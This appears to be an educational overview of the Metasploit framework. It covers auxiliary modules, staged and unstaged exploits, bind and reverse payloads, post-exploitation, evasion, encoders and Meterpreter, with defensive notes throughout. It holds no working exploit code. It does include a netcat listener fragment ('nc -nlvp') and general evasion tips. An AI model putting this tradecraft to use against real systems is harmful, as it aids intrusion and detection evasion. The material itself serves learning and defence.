METASPLOIT
Metasploit functions as a framework that supports the full lifecycle of an operation: reconnaissance (auxiliary), exploitation, delivery of a payload, post‑exploitation (what you do after you get code execution), and techniques to avoid detection (evasion/encoding). Think of it as a toolkit with modules that each serve one role in that lifecycle. Understanding the role of each component helps both red‑teamers and defenders reason about how an incident unfolds.
COMPONENTS
AUXILIARY (RECON & SUPPORT)
The auxiliary component is used to gather information, discover targets, and run helpful services. They do not produce remote code execution by themselves.
Information gathering: collect banners, host/service metadata, basic host facts (OS, versions).
Enumeration: more focused probing to identify exposed services, open ports, or weak configurations (scanners, network sniffers, web crawlers).
Fuzzers: stress or malformed‑input testing on a protocol or app to find crashes or logic faults.
Protocol/application servers: run lightweight services for testing or to emulate behaviors for research.
Admin tools: credential testing or verification when you already possess credentials (used for validating access, not for breaking in).
Defensive note: telemetry from network scanning and enumeration often appears as noisy flows. Monitoring and rate‑limiting, as well as service/honeypot configuration, helps detect abuse.
EXPLOITS
This takes advantage of a vulnerability to enable code execution or privilege escalation on a target. An exploit is the mechanism that triggers a bug; it is typically paired with a payload that defines what runs after the vulnerability is triggered.
An exploit by itself triggers the vulnerability; the payload is what executes afterward (a separate component).
Some exploit modules are designed to deliver a small loader (staged) that then fetches a larger agent; others attempt to perform everything in one step (unstaged).
Staged: initial small loader runs first, then pulls down the larger payload in stages. Smaller first stage is often used to be stealthier or to get around size constraints.
Unstaged: the full payload is delivered at once (bigger, but simpler since nothing additional is fetched).
Use exploit/multi/handler which are designed to catch request like callbacks. Think of the multi/handler as a "listener" such as "nc -nlvp ..."
PAYLOADS (WHAT RUNS AFTER EXPLOITATION)
These define the code or behavior executed on the target after successful exploitation.
Interactive shells: gives an operator a command interface to the remote host.
Agents / advanced shells: richer agents that support file operations, process enumeration, in‑memory features, etc.
One‑shot commands: execute a single command and return output.
Bind payloads: opens a listening port on the target and wait for the operator to connect. Useful when the target is directly reachable and not behind a FW. Think server on the target side where clients connect.
Reverse payloads: The target connects back to the malicious operator. Useful when direct inbound connectivity to the target is blocked by firewalls/NAT. Think server on the threat actor side where targets can connect. FWs on the target side typically prevents connection from outside/external clients. However, targets that are behind the FW aren't typically subject to such restrictions.
Defensive note: Network monitoring for unusual outbound connections (especially to uncommon ports or remote hosts) and endpoint protections that inspect behaviors rather than static signatures are valuable against reverse/staged techniques.
POST EXPLOITATION
This is what an operator does once they have a foothold.
Information gathering: collect credentials, configuration, host inventory, local secrets.
Privilege escalation: attempts to increase privileges (local admin/root) to expand capabilities.
Persistence: create reliable re‑entry mechanisms so access survives reboots or credential changes.
Pivoting: Pivoting is the technique an operator uses to leverage an initial foothold on one machine to reach additional systems or network segments that were not directly accessible from the attacker’s original location. This includes outside‑to‑inside pivoting, where an attacker compromises an externally accessible asset (for example, a public web server, VPN endpoint, or remote appliance) and then uses that host as a springboard to reach internal systems behind firewalls or segmentation. Conceptually it turns a compromised host into a launch point for reconnaissance, credential harvesting, and controlled access deeper into the environment; defenders should look for signs like unexpected internal connections originating from externally facing hosts, unusual protocol use crossing segments, or new remote sessions initiated from systems that normally don’t act as client machines.
Lateral movement: Lateral movement refers to the actions an intruder takes after gaining an initial foothold in a network to move from one compromised host to others and expand their control. It often involves discovering network relationships, reusing or stealing credentials, and leveraging legitimate administration tools or services to access additional systems which allows the attacker to escalate privileges, reach sensitive assets, and maintain persistence. Defenders can spot lateral movement by looking for abnormal internal connections, unexpected use of remote administration tools, unusual account activity, and authentications originating from machines that normally wouldn’t initiate them
Defensive note: Focus on anomaly detection: unusual process creation, suspicious privilege changes, new persistence mechanisms, or lateral SMB/RDP traffic can indicate post‑exploit activity.
EVASION/COVERT COMMS
This reduces the chance of detection by defenders.
Use encrypted channels or legitimate protocols (HTTPS, DNS over TLS) to blend in with normal traffic.
Avoid plainly visible clear‑text protocols (simple TCP/UDP flows with unusual payloads are easier to detect).
Time and volume control: lower frequency or smaller payload transfers to reduce noisy indicators.
Defensive note: Network behavior baselining, TLS inspection where appropriate, and endpoint telemetry (process lineage, parent/child relationships) are critical for spotting covert C2 channels.
ENCODERS (OBFUSCATION)
This transforms a binary or byte sequence to eliminate problematic characters or to evade signature detection.
Change representation of bytes or strings (simple encoding/obfuscation).
Remove or replace characters that break a delivery mechanism (e.g., null bytes in certain contexts).
Encoders are not cryptographic protection. They are obfuscation layers meant to alter signatures.
Defensive note: Behavioral detection and memory‑scanning techniques are more robust than relying on static signature matching, since encoders can defeat simple pattern checks.
METERPRETER AGENT
Meterpreter is an in‑memory post‑exploitation agent that runs inside the address space of a compromised process, allowing an operator to perform interactive actions without necessarily creating new persistent processes on disk. Because it executes with the permissions of the exploited process and avoids many on‑disk artifacts, it can be more difficult to detect by simple file‑based scanners; however, it is still discoverable through memory forensics, behavioral telemetry, and network monitoring. Meterpreter supports loadable extensions (for example, PowerShell, Python, and Kiwi/Mimikatz‑style modules) that expand its capabilities for post‑compromise tasks.
Last updated